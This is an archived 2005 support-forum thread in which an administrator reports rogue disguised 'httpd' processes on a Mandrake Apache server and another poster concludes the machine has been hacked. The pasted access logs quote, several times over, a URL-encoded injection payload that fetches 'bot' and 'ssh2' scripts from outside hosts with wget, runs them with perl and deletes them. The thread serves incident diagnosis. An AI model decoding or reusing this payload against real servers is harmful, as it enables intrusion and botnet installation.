|
Home > Archive > Apache Server configuration support > January 2005 > strange apache processes
You are viewing an archived Text-only version of the thread.
To view this thread in it's original format and/or if you want to reply to
this thread please [click here]
| Author |
strange apache processes
|
|
| Khorne 2005-01-20, 7:54 am |
| Hi,
I work on apache on a mandrake 10.1 and I found that apache launch strange
processes
Normal processes under mandrake look like this:
httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2 -DHAVE_PHP4 -DHAVE_ACCESS -DHAVE ...
But few minutes after starting apache, apache launch processes like this
/usr/local/apache/bin/httpd -DSSL
/usr/local/apache/bin/httpd - D55L
/usr/local/apache/bin/httpd - D5SL
This processes don't stop when I stop apache and I can't restart apache
until I kill them.
And of course there is no httpd files under /usr/local/apache/bin/ directory
I think it's a virus or a worm.
Below is some few lines from access_log
127.0.0.1 - - [20/Jan/2005:09:52:07 +0100] "GET
/your_server_is_infected_by_shanty.html?iID=188& rush=%2565%2563%2568%256F%2520%255F%2553
%2554%2541%2552%2554%255F%253B%2520cd%25
20/tmp%3bmkdir%2520.temp22%3bcd%2520.temp22%3bwget%2520http://www.quasi-sane.com/pics/bot.htm%3bwget%2520http://weblicious.com/
.notes/ssh2.htm%3bperl%2520ssh2.htm%3brm%2520ssh.htm%3bperl%2520bot.htm%3brm%2520bot. htm%253B%2520%2565%2563%2568%256F%2520%2
55F%2545%254E%2544%255F&highlight=%252527. %2570%2561%2573%2573%2574%2568%2572%2575
%2528%2524%2548%2554%2554%2550%255F%2547
%2545%25
54%255F%2556%2541%2552%2553%255B%2572%25
75%2573%2568%255D%2529.%252527'%3b
HTTP/1.1" 404 364 "-" "LWP::Simple/5.800"
127.0.0.1 - - [20/Jan/2005:09:52:12 +0100] "GET
/?t=13714& rush=%2565%2563%2568%256F%2520%255F%2553
%2554%2541%2552%2554%255F%253B%2520cd%25
20/tmp%3bmkdir%2520.temp22%3bcd%2520.temp22%3bwget%2520http://www.quasi-sane.com/pics/bot.htm%3bwget%2520http://weblicious.com/.notes/ssh2.htm%3bperl%2520ssh2.htm%3b
rm%2520ssh.htm%3bperl%2520bot.htm%3brm%2520bot. htm%253B%2520%2565%2563%2568%256F%2520%2
55F%2545%254E%2544%255F&highlight=%252527. %2570%2561%2573%2573%2574%2568%2572%2575
%2528%2524%2548%2554%2554%2550%255F%2547
%2545%2554%255F%2556%2541%2552%2553%255B
%2572%
2575%2573%2568%255D%2529.%252527'%3b
HTTP/1.1" 200 6980 "-" "LWP::Simple/5.800"
127.0.0.1 - - [20/Jan/2005:09:54:12 +0100] "GET
/?t=6& rush=%2565%2563%2568%256F%2520%255F%2553
%2554%2541%2552%2554%255F%253B%2520cd%25
20/tmp%3bmkdir%2520.temp22%3bcd%2520.temp22%3bwget%2520http://www.quasi-sane.com/pics/bot.htm%3bwget%2520http://weblicious.com/.notes/ssh2.htm%3bperl%2520ssh2.htm%3brm%2
520ssh.htm%3bperl%2520bot.htm%3brm%2520bot. htm%253B%2520%2565%2563%2568%256F%2520%2
55F%2545%254E%2544%255F&highlight=%252527. %2570%2561%2573%2573%2574%2568%2572%2575
%2528%2524%2548%2554%2554%2550%255F%2547
%2545%2554%255F%2556%2541%2552%2553%255B
%2572%2575
%2573%2568%255D%2529.%252527'%3b
HTTP/1.1" 200 6980 "-" "LWP::Simple/5.800"
127.0.0.1 - - [20/Jan/2005:10:45:12 +0100] "GET / HTTP/1.1" 200 6980 "-"
"LWP::Simple/5.800"
127.0.0.1 - - [20/Jan/2005:10:45:13 +0100] "GET / HTTP/1.1" 200 6980 "-"
"LWP::Simple/5.800"
127.0.0.1 - - [20/Jan/2005:10:46:30 +0100] "GET / HTTP/1.1" 200 6980 "-"
"LWP::Simple/5.800"
Thanks for your help,
Khorne
| |
| Davide Bianchi 2005-01-20, 7:54 am |
| On 2005-01-20, Khorne <khorne_fr1@hotmail.com> wrote:
> But few minutes after starting apache, apache launch processes like this
> /usr/local/apache/bin/httpd -DSSL
What a ps -ef | grep httpd shows?
> And of course there is no httpd files under /usr/local/apache/bin/ directory
Then is trying to run a process that doesn't exist. I don't think that is
apache the culprit.
> Below is some few lines from access_log
> 127.0.0.1 - - [20/Jan/2005:09:52:07 +0100] "GET
> /your_server_is_infected_by_shanty.html?iID=188& rush=%2565%2563%2568%256F%2520%255F%2553
%2554%2541%2552%2554%255F%253B%2520cd%25
20/tmp%3bmkdir%2520.temp22%3bcd%2520.temp22%3bwget%2520http://www.quasi-sane.com/pics/bot.htm%3bwget%2520http://weblicious.co
m/.notes/ssh2.htm%3bperl%2520ssh2.htm%3brm%2520ssh.htm%3bperl%2520bot.htm%3brm%2520bot. htm%253B%2520%2565%2563%2568%256F%2520%2
55F%2545%254E%2544%255F&highlight=%252527. %2570%2561%2573%2573%2574%2568%2572%2575
%2528%2524%2548%2554%2554%2550%255F%2547
%2545%
2554%255F%2556%2541%2552%2553%255B%2572%
2575%2573%2568%255D%2529.%252527'%3b
It looks like some kind of virus. Checked on google?
Davide
--
Bang on the LEFT side of your computer to restart Windows.
| |
| Khorne 2005-01-20, 7:54 am |
| That's what ps -ef | grep httpd shows:
root 19995 1 0 13:15 ? 00:00:00 httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20003 19995 0 13:15 ? 00:00:04 httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20024 19995 0 13:15 ? 00:00:06 httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20056 19995 0 13:15 ? 00:00:01 httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20331 19995 0 13:36 ? 00:00:05 httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20332 19995 0 13:36 ? 00:00:02 httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20333 19995 0 13:36 ? 00:00:02 httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20334 19995 0 13:36 ? 00:00:04 httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20335 19995 0 13:36 ? 00:00:03 httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20337 19995 0 13:36 ? 00:00:03 httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20436 1 0 13:42 ? 00:00:05
/usr/local/apache/bin/httpd - D5SL
apache 20507 19995 0 13:54 ? 00:00:02 httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20557 1 0 13:55 ? 00:00:03
/usr/local/apache/bin/httpd - D5SL
apache 20605 19995 0 13:55 ? 00:00:01 httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20778 19995 0 14:12 ? 00:00:00 httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20927 19995 0 14:25 ? 00:00:00 httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2...
root 20931 20928 0 14:25 ? 00:00:00 sh -c (ps -ef | grep httpd)
2>&1
root 20932 20931 0 14:25 ? 00:00:00 sh -c (ps -ef | grep httpd)
2>&1
root 20934 20932 0 14:25 ? 00:00:00 grep httpd
I've been searchig on google about this for a worm or virus, but I didn"t
find something.
Is there a kick solution to block this processes until a find a real
solution?
"Davide Bianchi" <davideyeahsure@onlyforfun.net> a écrit dans le message de
news: slrncuv7vv.186.davideyeahsure@fogg.onlyforfun.net...
> On 2005-01-20, Khorne <khorne_fr1@hotmail.com> wrote:
>
> What a ps -ef | grep httpd shows?
>
>
> Then is trying to run a process that doesn't exist. I don't think that is
> apache the culprit.
>
om/.notes/ssh2.htm%3bperl%2520ssh2.htm%3brm%2520ssh.htm%3bperl%2520bot.htm%3brm%2520bot. htm%253B%2520%2565%2563%2568%256F%2520%2
55F%2545%254E%2544%255F&highlight=%252527. %2570%2561%2573%2573%2574%2568%2572%2575
%2528%2524%2548%2554%2554%2550%255F%2547
%2545
%2554%255F%2556%2541%2552%2553%255B%2572
%2575%2573%2568%255D%2529.%252527'%3b[vbcol=seagreen]
>
> It looks like some kind of virus. Checked on google?
>
> Davide
>
> --
> Bang on the LEFT side of your computer to restart Windows.
| |
| Davide Bianchi 2005-01-20, 5:59 pm |
| On 2005-01-20, Khorne <khorne_fr1@hotmail.com> wrote:
> That's what ps -ef | grep httpd shows:
>
> root 19995 1 0 13:15 ? 00:00:00 httpd2 -f
> /etc/httpd/conf/httpd2.conf -DAPACHE2...
> apache 20003 19995 0 13:15 ? 00:00:04 httpd2 -f
> /etc/httpd/conf/httpd2.conf -DAPACHE2...
> apache 20436 1 0 13:42 ? 00:00:05
> /usr/local/apache/bin/httpd - D5SL
> apache 20557 1 0 13:55 ? 00:00:03
> /usr/local/apache/bin/httpd - D5SL
Ok, the first one is the 'correct' apache, the second one
is evidently a bugged version or the clear indication that your
machine have been hacked.
> Is there a kick solution to block this processes until a find a real
> solution?
Yes, pull the plug on your machine, boot from a clean media, mount
the partition read-only.
Davide
--
Windows Tip of the Day:
Add DEVICE=FNGRCROS.SYS to your CONFIG.SYS file.
|
|
|
|
|